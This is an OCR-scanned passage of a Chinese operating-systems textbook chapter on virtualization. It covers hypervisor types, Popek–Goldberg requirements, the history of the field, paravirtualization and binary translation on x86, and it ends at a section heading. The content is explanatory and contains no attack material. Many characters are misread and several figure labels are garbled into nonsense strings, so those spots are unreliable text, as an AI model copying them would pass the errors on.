困难 ， 因 为 各 个 应 用 程序 需要 不 同 的 操作 系统 、 运 行 库 、 配 置 文件 和 其 他 依赖 项 ， 而 虚拟 机 使 得 各 个 应 
用 程序 很 容易 拥有 自己 的 运行 环境 。 

虚拟 机 的 另 一 个 优势 是 设置 检查 点 和 虚拟 机 迁移 (例如 跨 多 台 服 务 器 进行 负载 均衡 ) 比 在 普通 操作 
系统 上 运行 的 迁移 要 容易 得 多 。 在 后 一 种 情况 下 ， 在 操作 系统 表 中 保留 有 关于 每 个 进程 的 大 量 关 键 状态 
信息 ， 包 括 打 开 的 文件 、 计 时 器 、 信 和 号 处 理 程序 等 。 而 迁移 虚拟 机 时 ， 只 需要 迁移 虚拟 机 的 内 存 和 磁盘 
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镜像 ， 就 能 完成 整个 操作 系统 的 迁移 。 

虚拟 机 的 另 一 个 用 途 是 在 已 停止 支持 或 无 法 工作 于 当前 硬件 的 操作 系统 (或 操作 系统 版 本 ) 上 运行 
遗留 应 用 程序 。 遗 留 应 用 程序 可 以 与 当前 应 用 程序 同时 运行 在 相同 硬件 上 。 事 实 上 ， 能 同时 运行 不 同 操 
作 系 统 中 的 应 用 程序 是 虚拟 机 受 欢迎 的 重要 理由 。 

虚拟 机 还 有 一 个 重要 用 途 是 协助 软件 开发 。 程 序 员 不 需要 在 多 台 机 器 上 安装 不 同 操作 系统 来 保证 软 
件 能 在 Windows 7, Windows 8、 不 同 版 本 的 Linux、FreeBSD、OpenBSD、NetBSD、OS X 及 其 他 操作 系 
统 上 运行 。 相 反 ， 他 只 需 在 一 台 机 器 上 创建 一 些 虚拟 机 来 安装 不 同 的 操作 系统 。 当 然 ， 他 也 可 以 对 磁盘 
进行 分 区 ， 在 每 个 分 区 上 安装 不 同 的 操作 系统 ， 但 这 种 方法 更 加 困难 。 首 先 ， 普 通 PC 不 管 磁盘 空间 有 多 
大 ， 都 只 支持 四 个 主 分 区 。 其 次 ， 虽 然 可 以 在 引导 块 上 安装 多 引导 程序 ， 但 是 不 同 操作 系统 之 间 的 切换 
需要 重启 计算 机 。 虚 拟 机 使 所 有 的 操作 系统 都 能 同时 运行 ， 因 为 这 些 虚 拟 机 实际 上 只 是 一 些 进程 。 

虚拟 化 技术 目前 最 重要 、 最 时 左 的 用 途 是 云 (cloud)。 云 的 核心 思想 很 直接 : 将 你 的 计算 或 存储 需 
求 外 包 给 一 个 管理 良好 的 数据 中 心 。 领 域 专家 组 成 的 公司 专门 运营 这 个 数据 中 心 。 由 于 数据 中 心 通常 是 
他 人 所 有 ， 因 此 你 需要 为 使 用 的 资源 付费 ， 但 是 你 不 用 考虑 机 器 、 供 电 、 冷 却 和 维护 问题 。 由 于 虚拟 化 
技术 提供 了 隔离 性 ， 因 此 云 提 供 商 可 以 允许 多 个 客户 其 至 商业 竞争 对 手 共享 单一 物理 机 ， 每 个 客户 分 享 
一 部 分 资源 。 早 其 有 人 认为 这 些 资源 是 虚无 绿 纳 的 ， 现 实 中 不 会 有 机 构 愿 意 将 敏感 的 数据 和 计算 放 到 他 
人 的 资源 上 完成 。 然 而 ， 目 前 不 计 其 数 的 机 构 在 云 上 的 虚拟 机 中 运行 着 自己 的 应 用 程序 。 虽 然 并 非 适 用 
于 所 有 机 构 和 所 有 数据 ， 但 云 计 算 毫 无 疑问 已 取得 了 成 功 。 


7.1 历史 


伴随 着 近年 来 围绕 虚拟 化 的 大 肆 宣 传 ， 人 们 有 时 会 忘记 相对 于 互联 网 的 出 现 ， 虚 拟 机 是 相当 古老 的 
技术 。 早 在 20 世 纪 60 年 代 ，IBM 就 试验 了 两 个 独立 开发 的 虚拟 机 管理 程序 SIMMON 和 CP-40。 虽 然 CP- 
40 只 是 一 个 研究 项 目 ， 但 它 被 重新 实现 为 CP-67， 构 成 了 CP/CMS 的 控制 程序 。CP/CMS 是 IBM 
System/360 Model 67 的 虚拟 机 操作 系统 。1972 年 ， 它 又 被 重新 实现 为 VM/370, -用 在 System/370 系 列 上 。 
IBM 在 20 世 纪 90 年 代 将 System/370 产 品 线 替换 为 System/390。 这 些 更 新 基本 上 只 有 名 字 发 生 了 变化 ， 底 
层 体系 结构 出 于 向 后 兼容 性 的 原因 保持 不 变 。 当 然 ， 硬 件 技术 的 改进 使 得 新 机 器 比 老 机 器 更 大 更 快 了 。 
但 就 虚拟 化 而 言 ， 没 有 任何 改变 。2000 年 ，IBM 发 布 了 z 系 列 ， 支 持 64 位 地 址 空间 ， 但 仍 向 后 兼容 
System/360。 在 x86 上 的 虚拟 化 技术 流行 起 来 的 几 十 年 前 ， 这 些 系 统 就 开始 支持 虚拟 化 技术 了 。 

1974 年 ， 加 州 大 学 洛杉矶 分 校 (UCLA) 的 两 位 计算 机 科学 家 Gerald Popek 和 Robert Goldberg 发 表 
了 一 篇 题 为 “Formal Requirements for Virtualizable Third Generation Architectures” 的 开创 性 论文 。 论 文 
中 列 出 了 一 个 计算 机 体系 结构 有 效 支持 虚拟 化 所 需 满足 的 条 件 (Popek 和 Goldberg，1974)。 任 何 关 于 虚 
拟 化 的 书籍 都 会 引用 他 们 的 工作 和 术语 。 同 样 起 源 于 20 世 纪 70 年 代 的 x86 体 系 结构 数 十 年 来 一 直 不 满足 
论文 中 列 出 的 条 件 。 此 外 ， 自 大 型 机 以 来 几乎 所 有 体系 结构 也 不 满足 这 些 条 件 。20 世 纪 70 年 代 是 一 个 多 
产 的 年 代 ， 同 时 诞生 的 还 有 UNIX、 以 太 网 、Cray-1、Microsoft 和 Apple。 因 此 ， 无 论 你 的 父母 说 什么 ， 
20 世 纪 70 年 代 绝 不 仅仅 是 迪斯科 的 年 代 ! 

事实 上 ， 真 正 的 “迪斯科 ”变革 起 源 于 20 世 纪 90 年 代 ， 斯 坦 福 大 学 的 研究 人 员 开 发 了 一 种 名 为 
Disco 的 新 型 虚拟 机 管理 程序 ， 接 下 来 成 立 了 VMware。VMware 是 虚拟 化 领域 的 巨头 ， 提 供 第 一 类 和 第 
二 类 虚拟 机 管理 程序 ， 年 收入 数 十 亿美 元 (Bugnion FA, 1997, Bugnion 等 人 ，2012)。 巧合 的 是 第 一 
类 和 第 二 类 虚拟 机 管理 程序 的 区 别 也 是 20 世 纪 70 年 代 提出 的 (Goldberg，1972)。VMware 在 1999 年 推出 
了 第 一 个 虚拟 化 解决 方案 。 接 下 来 ， 更 多 虚拟 化 产品 陆续 涌现 ， 如 Xen、KVM、YVirtualBox、Hyper-V、 
Parallels 等 。 看 起 来 此 时 才 是 推广 虚拟 化 技术 的 合适 时 机 ， 虽 然 理 论 早 在 1974 年 就 明确 了 ，IBM 也 已 销 
售 了 支持 并 广泛 使 用 虚拟 化 技术 的 计算 机 长 达 几 十 年 之 入。 尽管 1999 年 虚拟 化 技术 突然 间 受 到 了 广泛 关 
注 ， 然 而 它 并 不 是 一 项 新 技术 。 


7.2 虚拟 化 的 必要 条 件 


对 于 虚拟 机 来 讲 ， 非 常 重要 的 一 点 是 要 像 真 实 的 机 器 那样 运转 。 例 如 ， 虚 拟 机 要 能 像 真 实 的 机 器 那 
样 启动 ， 支 持 安装 任意 操作 系统 。 虚 拟 机 管理 程序 的 任务 就 是 提供 这 种 幻象 ， 并 高 效 地 实现 。 虚 拟 机 管 
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理 程序 需要 在 以 下 三 个 维度 上 有 良好 的 表现 : 

1) 安全 性 : 虚拟 机 管理 程序 应 完全 掌控 虚拟 资源 。 

2) 保 真 性 : 程序 在 虚拟 机 上 执行 的 行为 应 与 在 裸 机 上 相同 。 

3) 高 效 性 : 虚拟 机 中 运行 的 大 部 分 代码 应 不 受 虚拟 机 管理 程序 的 干涉 。 

毫 无 疑问 ， 在 解释 器 (例如 Bochs) 中 逐条 考虑 指令 并 准确 执行 其 行为 是 一 种 安全 执行 指令 的 方式 。 
有 些 指令 可 以 直接 执行 ， 例 如 解释 器 可 以 按 原样 执行 INC ( 增 量 ) 指令 。 其 他 不 能 安全 地 直接 执行 的 指 
令 需 要 由 解释 器 进行 模拟 。 例 如 ， 不 能 真正 允许 客户 操作 系统 禁用 整 台 机 器 的 中 断 ， 或 者 修改 页 表 映 射 。 
模拟 的 技巧 是 使 虚拟 机 管理 程序 上 运行 的 操作 系统 认为 自己 已 经 禁用 了 中 断 或 修改 了 页 表 映 射 。 具 体 的 
实现 方式 稍 后 讨论 。 目 前 ， 可 以 认为 解释 器 能 够 保证 安全 性 ， 如 果 精 心 实现 甚至 能 做 到 高 保 真 ， 但 是 解 
释 器 的 性 能 堪忧 。 为 了 满足 性 能 要 求 ， 我 们 将 看 到 虚拟 机 管理 程序 试图 直接 执行 大 多 数 代码 。 

下 面 来 讨论 保 真性 。 虚 拟 化 在 x86 体 系 结构 上 长 期 以 来 一 直 是 个 问题 ， 因 为 Intel 386 体 系 结构 中 的 
缺陷 以 向 后 兼容 的 名 义 在 新 CPU 中 延续 了 20 年 。 简 而 言 之 ， 每 个 包含 内 核 态 和 用 户 态 的 CPU 都 有 一 个 特 
殊 的 指令 集合 ， 其 中 的 指令 在 内 核 态 和 用 户 态 执 行 的 行为 不 同 。 这 些 指令 包括 进行 1O 操 作 和 修改 MMU 
设置 的 指令 ，Popek 和 Goldberg 称 之 为 敏感 指令 (sensitive instruction)。 还 有 另 一 个 指令 集合 ， 其 中 的 指 
令 在 用 户 态 执行 时 会 导致 陷入 ，Popek 和 Goldberg 称 之 为 特权 指令 (privileged instruction)。 他 们 的 论文 
首次 指出 机 器 可 虚拟 化 的 一 个 必要 条 件 是 敏感 指令 为 特权 指令 的 子 集 。 简 单 来 说 ， 如 果 用 户 态 想 要 做 不 
应 该 在 用 户 态 做 的 事情 ， 硬 件 必须 陷入 。IBM/370O 有 这 一 特性 而 Intel 386 没 有 。 很 多 Intel 386 敏 感 指令 在 
用 户 态 执行 时 具有 不 同 的 行为 或 者 直接 被 忽略 。 例 如 ，POPF 指 令 替换 标志 寄存 器 ， 会 修改 中 断 启 用 / 禁 
用 位 。 在 用 户 态 ， 这 一 位 不 会 被 修改 。 因 此 ，386 及 其 后 继 者 不 能 被 虚拟 化 ， 也 不 能 直接 支持 虚拟 机 管 
理 程序 。 

实际 情况 比 上 面 描述 的 更 严重 。 除 了 敏感 指令 在 用 户 态 未 能 陷入 的 问题 外 ， 还 存在 可 以 在 用 户 态 读 
取 敏 感 状态 而 不 造成 陷入 的 指令 (这 类 指令 在 内 核 态 和 用 户 态 执行 的 行为 相同 ， 因 而 不 属于 敏感 指令 ) 。 
例如 ， 在 2005 年 之 前 的 x86 处 理 器 上 ， 程 序 可 以 通过 读 取代 码 段 选择 符 判断 自身 运行 在 用 户 态 还 是 内 核 
态 。 在 虚拟 机 中 ， 操 作 系统 车 这 样 做 并 发 现 自己 运行 在 用 户 态 ， 就 会 做 出 错误 的 决策 。 

从 2005 年 起 ，Intel 和 AMD 开 始 在 CPU 中 引入 虚拟 化 支持 ， 使 得 这 个 问题 最 终 得 到 解决 (Uhlig, 
2005) 。 在 Intel CPU 中 ， 这 项 技术 称 作 VT (Virtualization Technology) ， 在 AMD CPU 中 ， 这 项 技术 称 作 
SVM (Secure Virtual Machine)。 接 下 来 将 使 用 VT 作为 通用 的 术语 。 这 两 项 技术 都 受 IBM VM/370 的 启 
发 ,但 有 细微 的 差别 。VT 技 术 的 基本 思想 是 创建 可 以 运行 虚拟 机 的 容器 。 客 户 操作 系统 在 容器 中 启动 
并 持续 运行 ， 直 到 触发 异常 并 陷入 虚拟 机 管理 程序 ， 例 如 试图 执行 /JO 指令 时 。 会 造成 陷入 的 指令 集合 
由 虚拟 机 管理 程序 设置 的 硬件 位 图 控制 。 有 了 这 些 扩展 之 后 ， 在 x86 平 台 实 现 经 典 的 陷入 并 模拟 (trap- 
and-emulate) 虚拟 机 成 为 可 能 。 

敏锐 的 读者 可 能 已 经 发 现 了 目前 为 止 的 描述 中 存在 明显 的 矛盾 。 一 方面 ， 我 们 说 过 x86 在 2005 年 引 
入 体系 结构 扩展 之 前 不 可 虚拟 化 。 另 一 方面 ， 我 们 看 到 VMware 早 在 1999 年 就 发 布 了 第 一 款 x86 虚 拟 机 管 
理 程 序 。 这 两 者 怎么 能 同时 成 立 ? 答案 是 2005 年 之 前 的 虚拟 机 管理 程序 并 未 真正 运行 原始 的 客户 操作 系 
统 。 虚 拟 机 管理 程序 在 运行 中 改写 了 部 分 代码 ， 将 有 问题 的 指令 替换 成 了 安全 的 指令 序列 ， 模 拟 原 指令 
的 功能 。 例 如 ， 假 设 客户 操作 系统 执行 特权 IO 指令 ， 或 者 修改 CPU 的 特权 控制 寄存 器 (如 保存 页 目录 
地 址 的 CR3 寄 存 器 ) 。 这 些 指令 的 执行 结果 必须 被 限制 在 虚拟 机 内 部 ， 不 能 影响 其 他 虚拟 机 或 者 虚拟 机 
管理 程序 自身 。 因 而 ， 一 条 不 安全 的 IO 指令 会 被 替换 成 一 个 陷 人 操作， 经 过 安全 性 检查 之 后 ， 执 行 等 
价 的 指令 并 返回 结果 。 由 于 进行 了 改写 操作 ， 因 此 可 以 替换 掉 不 属于 特权 指令 的 敏感 指令 。 其 他 的 指令 
可 以 直接 执行 。 这 项 技术 称 作 二 进 制 翻译 (binary translation) ，7.4 节 将 讨论 更 多 的 细节 。 

并 不 是 所 有 的 敏感 指令 都 必须 进行 改写 ， 例 如 客户 机 上 的 用 户 进程 通常 能 直接 运行 而 无 需 修改 。 如 
果 一 条 敏感 指令 不 是 特权 指令 ， 并 且 它 在 用 户 态 的 行为 与 内 核 态 不 同 ， 那 么 就 不 需要 改写 ， 因 为 本 身 就 
是 在 用 户 态 执行 该 指令 。 对 属于 特权 指令 的 敏感 指令 ， 仍 采取 经 典 的 陷 人 并 模拟 方法 。 当 然 ，( 第 二 类 ) 
虚拟 机 管理 程序 必须 保证 自己 能 收 到 对 应 的 陷 人 人。 通常， 虚拟 机 管理 程序 在 底层 操作 系统 内 核 中 有 一 个 
模块 ， 用 于 将 陷入 转 到 自己 的 处 理 程序 中 。 
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另 一 种 不 同类 型 的 虚拟 化 称 作 半 虚拟 化 (paravirtualization)。 半 虚拟 化 的 目标 不 是 呈现 出 一 个 与 底层 
硬件 一 模 一 样 的 虚拟 机 ， 因 而 区 别 于 全 虚拟 化 (full virtualization)。 半 虚拟 化 提供 一 层 类 似 物 理 机 器 的 软件 
接口 ， 显 式 暴 露出 自身 是 一 个 虚拟 化 的 环境 。 例 如 ， 它 提供 一 组 虚拟 化 调用 (hypercall) ， 人 允许 客户 机 向 虚 
拟 机 管理 程序 发 送 显 式 的 请 求 ， 就 像 系 统 调用 为 应 用 程序 提供 服务 那样 。 客 户 机 使 用 虚拟 化 调用 执行 特权 
操作 ， 如 修改 页 表 等 ， 但 由 于 操作 是 客户 机 和 虚拟 机 管理 程序 协作 完成 的 ， 因 此 整个 系统 更 加 简单 快速 。 

半 虚 拟 化 也 不 是 一 项 新 技术 。IBM 的 VM 操作 系统 从 1972 年 起 就 提供 了 这 样 的 功能 ， 虽 然 名 字 不 同 。 
这 个 想法 在 Denali (Whitaker 等 人 ，2002) 和 Xen (Barham 等 人 ，2003) 虚拟 机 管理 程序 上 被 重新 使 用 。 
与 全 虚拟 化 相 比 ， 半 虚拟 化 的 缺点 是 客户 机 需要 了 解 虚拟 机 API。 这 就 意味 着 客户 操作 系统 一 般 需 要 为 
虚拟 机 管理 程序 进行 显 式 定制 。 

在 深入 探究 第 一 类 和 第 二 类 虚拟 机 管理 程序 之 前 ， 需 要 指出 的 是 并 非 所 有 的 虚拟 化 技术 都 试图 使 客 
户 机 认为 它 拥 有 整个 系统 。 有 了 时， 目标 仅仅 是 使 一 个 为 另 一 操作 系统 、 体 系 结构 编写 的 程序 能 够 正常 运 
行 。 因 此 ， 我 们 需要 将 完全 的 系统 虚拟 化 和 进程 级 虚拟 化 (process-level virtualization) 区 分 开 来 。 虽 然 
本 章 接 下 来 重点 关注 前 者 ， 但 是 后 者 在 实践 中 也 有 应 用 。 著 名 的 例子 包括 WINE 兼 容 层 ， 人 允许 Windows 
应 用 程序 运行 在 POSIX 兼 容 的 系统 上 ， 如 Linux、BSD 和 OS X。 还 有 QEMU 模 拟 器 的 进程 级 版 本 ， 能 让 
一 个 体系 结构 的 应 用 程序 运行 在 另 一 个 体系 结构 上 。 


7.3 第 一 类 和 第 二 类 虚拟 机 管理 程序 


Goldberg (1972) 区 分 了 两 类 虚拟 化 方法 。 图 7-1a 展 示 了 第 一 类 虚拟 机 管理 程序 。 从 技术 上 讲 ， 第 
一 类 虚拟 机 管理 程序 就 像 一 个 操作 系统 ， 因 为 它 是 唯一 一 个 运行 在 最 高 特权 级 的 程序 。 它 的 工作 是 支持 
真实 硬件 的 多 个 虚拟 机 (virtual machine) 拷贝 ， 类似 于 普通 操作 系统 支持 的 进程 。 
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第 一 类 虚拟 机 管理 程序 
硬件 (CPU、 磁 盘 、 
网 络 、 中 断 等 ) 
a) b) 
图 7-1 两 类 虚拟 机 管理 程序 在 系统 中 的 位 置 


图 7-1b 展 示 的 第 二 类 虚拟 机 管理 程序 则 不 同 。 它 是 一 个 依赖 于 Windows、Linux 等 操作 系统 分 配 和 
调度 资源 的 程序 ， 很 像 一 个 普通 的 进程 。 当 然 ， 第 二 类 虚拟 机 管理 程序 仍 伪装 成 具有 CPU 和 各 种 设备 的 
完整 计算 机 。 两 类 虚拟 机 管理 程序 都 必须 以 一 种 安全 的 方式 执行 机 器 指令 。 例 如 ， 运 行 在 虚拟 机 管理 程 
序 上 的 一 个 操作 系统 可 能 修改 其 至 弄 乱 自己 的 页 表 ， 但 不 能 影响 其 他 虚拟 机 操作 系统 。 

运行 在 两 类 虚拟 机 管理 程序 上 的 操作 系统 都 称 作客 户 操作 系统 (guest operating system) 。 对 于 第 二 
类 虚拟 机 管理 程序 ， 运 行 在 底层 硬件 上 的 操作 系统 称 作 宿主 操作 系统 (host operating system), 
VMware Workstation 是 首 个 x86 平 台 的 第 二 类 虚拟 机 管理 程序 (Bugnion 等 人 ，2012)。 本 节 介 绍 其 基 
本 思想 ，7.12 节 将 详细 研究 VMware。 

第 二 类 虚拟 机 管理 程序 有 时 又 称 作 托管 型 虚拟 机 管理 程序 ， 依 赖 Windows、Linux、OS X 等 宿主 操 
作 系 统 提 供 的 大 量 功 能 。 首 次 启动 时 ， 第 二 类 虚拟 机 管理 程序 像 一 个 刚 启 动 的 计算 机 那样 运转 ， 期 望 找 
到 一 个 包含 操作 系统 的 DVD、U 盘 或 CD-ROM。 这 些 驱动 器 可 以 是 虚拟 设备 ， 例 如 ， 可 以 将 包含 操作 系 
统 的 镜像 保存 为 宿主 机 硬盘 上 的 ISO 文件 ， 让 虚拟 机 管理 程序 伪装 成 从 正常 DVD 驱动 器 中 读 取 。 接 下 来 ， 
虚拟 机 管理 程序 运行 DVD 上 的 安装 程序 ， 将 操作 系统 安装 到 虚拟 磁盘 (virtual disk， 其 实 只 是 宿主 操作 
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系统 中 的 一 个 文件 ) 上 。 客 户 操 作 系统 安装 完成 后 ， 就 能 启动 并 运行 了 。 
图 7-2 总 结 了 目前 为 止 讨论 过 的 虚拟 化 技术 类 别 ， 包 括 第 一 类 和 第 二 类 虚拟 机 管理 程序 ， 并 举例 说 
明了 每 种 技术 类 别 和 虚拟 机 管理 程序 的 组 合 。 


DE O I eer aera 
进程 虚拟 化 i 

图 7-2 虚拟 机 管理 程序 示例 : 第 一 类 虚拟 机 管理 程序 运行 在 裸 机 上 ， 第 二 类 虚拟 机 管理 程序 依赖 于 宿主 操 
作 系 统 的 系统 服务 


7.4 高 效 虚拟 化 技术 


本 节 将 详细 研究 可 虚拟 化 与 性 能 这 两 个 重要 问题 。 假 设 目前 有 一 个 支持 一 台 虚 拟 机 的 第 一 类 虚拟 机 
管理 程序 ， 如 图 7-3 所 示 。 与 其 他 第 一 类 虚拟 机 管理 程序 一 样 ， 它 也 运行 在 裸 机 上 。 虚 拟 机 作为 用 户 态 
的 一 个 进程 运行 ， 不 允许 执行 (Popek-Goldberg 意 义 上 的 ) 敏感 指令 。 然 而 ， 虚 拟 机 上 的 操作 系统 认为 
自己 运行 在 内 核 态 (实际 上 不 是 )。 我 们 称 之 为 虚拟 内 核 态 (virtual kernel mode)。 虚 拟 机 中 也 运行 用 户 
进程 ， 这 些 用 户 进程 认为 自己 运行 在 用 户 态 (实际 上 确实 是 的 )。 


用 户 进程 







or] 





图 7-3 当 虚 拟 机 中 的 操作 系统 执行 了 一 个 内 核 指令 时 ， 如 果 支 持 虚 拟 化 技术 ， 那 么 它 会 陷 人 虚拟 机 管理 程序 


当 (认为 自己 处 于 内 核 态 的 ) 客户 操作 系统 执行 了 一 条 只 有 CPU 真 正 处 于 内 核 态 才 允许 执行 的 指令 时 ， 
RETHA? 通常 ， 在 不 支持 VT 的 CPU 上 ， 这 条 指令 执行 失败 并 导致 操作 系统 崩溃 。 在 支持 VT 的 CPU 上 ， 
客户 操作 系统 执行 敏感 指令 时 ， 会 陷入 虚拟 机 管理 程序 ， 如 图 7-3 所 示 。 虚 拟 机 管理 程序 可 以 检查 这 条 指 
令 是 由 虚拟 机 中 的 客户 操作 系统 执行 的 还 是 用 户 程序 执行 的 。 如 果 是 前 者 ， 虚 拟 机 管理 程序 将 安排 这 条 指 
令 功能 的 正确 执行 。 否 则 ， 虚 拟 机 管理 程序 将 模拟 真实 硬件 面 对 用 户 态 执行 敏感 指令 时 的 行为 。 


7.4.1 在 不 支持 虚拟 化 的 平台 上 实现 虚拟 化 

在 支持 VT 的 平台 上 构建 虚拟 机 系统 相对 直接 一 些 , 在 VT 出 现 之 前 人 们 是 怎么 实现 虚拟 化 的 ?例如 ， 
VMware 在 x86 虚 拟 化 扩展 到 来 前 就 发 布 了 虚拟 机 管理 程序 。 答 案 是 软件 工程 师 们 利用 二 进 制 翻译 和 x86 
平台 确实 存在 的 硬件 特性 (如 处 理 器 的 特权 级 ) 构建 出 了 虚拟 机 系统 。 

多 年 来 ，x86 支 持 四 个 特权 级 。 用 户 程序 运行 在 第 3 级 上 , 权限 最 少 。 在 此 级 别 中 不 能 执行 特权 指令 。 
第 0 级 是 最 高 特权 级 ， 人 允许 执行 任何 指令 。 在 正常 运转 中 ， 操 作 系统 内 核 运行 在 第 0 级 。 现 有 的 操作 系统 
均 未 使 用 剩 下 的 两 个 特权 级 。 换 名 话说， 虚拟 机 管理 程序 可 以 自由 使 用 剩 下 的 两 个 特权 级 。 如 图 7-4 所 
示 ， 很 多 虚拟 化 解决 方案 保持 了 虚拟 机 管理 程序 运行 于 内 核 态 (第 0 级 )， 应 用 程序 运行 于 用 户 态 (第 3 
级 )， 但 将 客户 操作 系统 安排 到 一 个 中 间 特 权 级 〈 第 1 级 ) 。 结 果 是 内 核 比 用 户 进 程 的 特权 级 高 ， 用 户 进 
程 如 果 尝 试 访问 内 核 内 存 就 会 导致 访问 冲突 。 同 时 ， 客 户 操作 系统 执行 的 特权 指令 会 陷入 虚拟 机 管理 程 
序 。 虚 拟 机 管理 程序 检查 之 后 代表 客户 机 执行 特权 指令 的 功能 。 
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用 户 进程 


客户 操作 系统 AD 
(在 执行 和 模拟 之 前 进行 二 进 制 改写 ) 


第 一 类 虚拟 机 管理 程序 





图 7-4 二 进 制 翻译 器 改写 运行 在 第 1 级 的 客户 操作 系统 ， 虚 拟 机 管理 程序 运行 在 第 0 级 

虚拟 机 管理 程序 确保 客户 操作 系统 中 的 敏感 指令 不 再 执行 ， 具 体 做 法 是 代码 改写 ， 一 次 改写 一 个 基 
本 块 。 基 本 块 (basic block) 是 以 转移 指令 结尾 的 一 小 段 顺序 指令 序列 ， 除 最 后 一 条 指令 外 ， 内 部 不 含 
跳 转 、 调 用 、 陷 入 、 返 回 或 其 他 改变 控制 流 的 指令 。 在 执行 一 个 基本 块 之 前 ， 虚 拟 机 管理 程序 扫描 该 基 
本 块 以 寻找 (Popek-Goldberg 意 义 上 的 ) 敏感 指令 ， 如 果 存 在 ， 就 替换 成 调用 虚拟 机 管理 程序 中 处 理 例 
程 的 指令 。 最 后 一 条 转移 指令 也 会 被 替换 成 调用 虚拟 机 管理 程序 的 指令 , -以 确保 下 一 基本 块 能 重复 此 过 
程 。 动 态 翻 译 和 模拟 听 起 来 代价 很 大 ， 但 通常 并 非 如 此 。 翻 译 过 的 基本 块 可 以 缓存 下 来 ， 以 后 无 需 再 次 
翻译 。 而 且 ， 大 多 数 基 本 块 并 不 包含 敏感 指令 或 特权 指令 ， 可 以 直接 执行 。 如 果 虚 拟 机 管理 程序 精心 配 
置 硬件 (如 VMware 所 做 的 那样 )， 那 么 二 进 制 翻 译 器 可 以 忽略 所 有 用 户 进 程 ， 毕 竟 它 们 确实 是 在 用 户 态 
执行 的 。 

一 个 基本 块 执行 完毕 后 ， 控 制 流 返回 虚拟 机 管理 程序 ， 以 定位 下 一 个 基本 块 。 如 果 下 一 个 基本 块 已 
经 翻译 过 ， 就 能 立即 执行 。 否 则 ， 下 一 个 基本 块 将 被 翻译 、 缓 存 、 执 行 。 最 终 ， 程 序 的 绝 大 部 分 都 将 在 
缓存 里 ， 程 序 能 以 接近 满 速 运行 。 此 过 程 中 会 用 到 各 种 优化 ， 例 如 ， 如 果 一 个 基本 块 以 跳 转 到 (或 调用 ) 
另 一 个 基本 块 结尾 ， 则 结尾 的 指令 可 以 替换 成 直接 跳 转 到 (或 调用 ) 翻译 过 的 基本 块 ， 从 而 消除 与 查找 
后 继 块 相 关联 的 所 有 开销 。 再 次 强调 ， 用 户 程序 中 的 敏感 指令 无 需 替换 ， 硬 件 会 处 理 好 。 

另 一 方面 ， 在 所 有 运行 于 第 1 级 的 客户 操作 系统 代码 上 进行 二 进 制 翻 译 并 替换 可 能 造成 陷入 的 特权 
指令 的 做 法 也 很 常见 。 因 为 陷入 的 开销 很 大 ， 所 以 二 进 制 翻译 之 后 性 能 反而 更 好 。 

目前 为 止 我 们 描述 了 第 一 类 虚拟 机 管理 程序 。 虽 然 第 二 类 虚拟 机 管理 程序 在 概念 上 与 第 一 类 不 同 ， 
但 是 它们 在 很 大 程度 上 使 用 了 相同 的 技术 。 例 如 ，VMware ESX Server (2001 年 发 布 的 第 一 类 虚拟 机 管 
理 程序 ) 使 用 了 与 YMware Workstation (1999 年 发 布 的 第 二 类 虚拟 机 管理 程序 ) 完全 相同 的 二 进 制 翻译 
技术 。 

然而 , 直接 运行 客户 机 代码 并 使 用 完全 相同 的 技术 需要 第 二 类 虚拟 机 管理 程序 能 在 最 底层 操纵 硬件 ， 
这 在 用 户 态 无 法 实现 。 例 如 ， 虚 拟 机 管理 程序 需要 为 客户 机 代码 设置 正确 的 段 描 述 符 。 为 了 实现 准确 可 
靠 的 虚拟 化 ， 还 需要 让 客户 操作 系统 认为 自己 对 机 器 资源 和 整个 地 址 空间 (32 位 机 器 上 是 4GB) 有 完全 
的 掌控 。 如 果 让 客户 操作 系统 在 地 址 空间 里 发 现 了 宿主 操作 系统 的 踪影 ， 就 会 产生 冲突 。 

遗憾 的 是 ， 在 客户 机 的 常规 操作 系统 上 运行 用 户 程序 时 ， 情 况 就 是 如 此 。 例 如 ，Linux 中 一 个 用 户 
进程 可 以 访问 4GB 地 址 空间 中 的 3GB， 剩 下 的 1GB 由 内 核 保留 ， 访 问 这 1GB 地 址 空间 会 导致 陷入 。 原 则 
上 ， 可 以 捕获 陷入 并 模拟 合适 的 操作 ,但 这 样 做 开销 太 大 ， 还 需要 在 宿主 机 内 核 中 安装 恰当 的 陷入 处 理 
程序 。 另 一 个 显而易见 的 方法 是 重新 配置 系统 ， 移 除 宿主 操作 系统 ， 给 予 客户 机 完整 的 地 址 空间 。 然 而 ， 
显然 不 可 能 在 用 户 态 这 样 做 。 

类 似 地 ， 虚 拟 机 管理 程序 还 需要 正确 地 处 理 中 断 ， 例 如 磁盘 发 出 的 中 断 或 缺 页 异常 。 如 果 虚 拟 机 管 
理 程 序 要 使 用 陷 人 并 模拟 的 方式 处 理 中 断 ， 同 样 需 要 能 接收 陷 人 ， 而 用 户 进 程 不 可 能 在 内 核 中 安装 陷 人 
/中 断 处 理 程序 。 

因此 ， 大 多 数 现代 的 第 二 类 虚拟 机 管理 程序 有 一 个 在 第 0 级 运行 的 内 核 模 块 ， 能 够 使 用 特权 指令 操 
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纵 硬 件 。 当 然 ， 在 最 底层 操纵 硬件 并 给 予 客户 机 完整 的 地 址 空间 已 经 没 问题 了 ， 但 在 特定 时 刻 虚拟 机 管 
理 程序 需要 清除 设置 并 还 原 原 始 的 处 理 器 上 下 文 。 例 如 ， 假 设 客户 机 运行 时 一 个 外 围 设备 产生 中 断 。 由 
于 第 二 类 虚拟 机 管理 程序 依赖 宿主 操作 系统 的 设备 驱动 程序 来 处 理 中 断 ， 因 此 它 需 要 重新 配置 硬件 以 运 
行 宿主 操作 系统 代码 。 当 设备 驱动 程序 运行 时 ， 需 保证 一 切 像 它 期 望 的 那样 。 虚 拟 机 管理 程序 就 像 趁 父 
母 不 在 家 举办 聚会 的 青少年 一 样 ， 他 们 可 以 重新 摆 放 家 具 ， 只 要 在 父母 回来 前 把 家 具 复 位 即 可 。 由 宿主 
操作 系统 的 硬件 配置 切换 到 客户 操作 系统 的 硬件 配置 称 作 系统 切换 (world switch) ，7.12 节 将 在 讨论 
VMware 时 详细 探讨 系统 切换 。 

我 们 现在 应 该 清楚 了 为 什么 虚拟 机 管理 程序 能 在 不 支持 虚拟 化 的 硬件 上 工作 : 客户 机 内 核 的 敏感 指 
令 被 替换 为 对 模拟 这 些 指令 的 例 程 的 调用 。 真 实 硬件 不 会 直接 执行 客户 操作 系统 中 的 敏感 指令 。 这 些 敏 
感 指令 被 转 为 对 虚拟 机 管理 程序 的 调用 ， 虚 拟 机 管理 程序 模拟 了 这 些 指令 的 功能 。 


7.4.2 虚拟 化 的 开销 

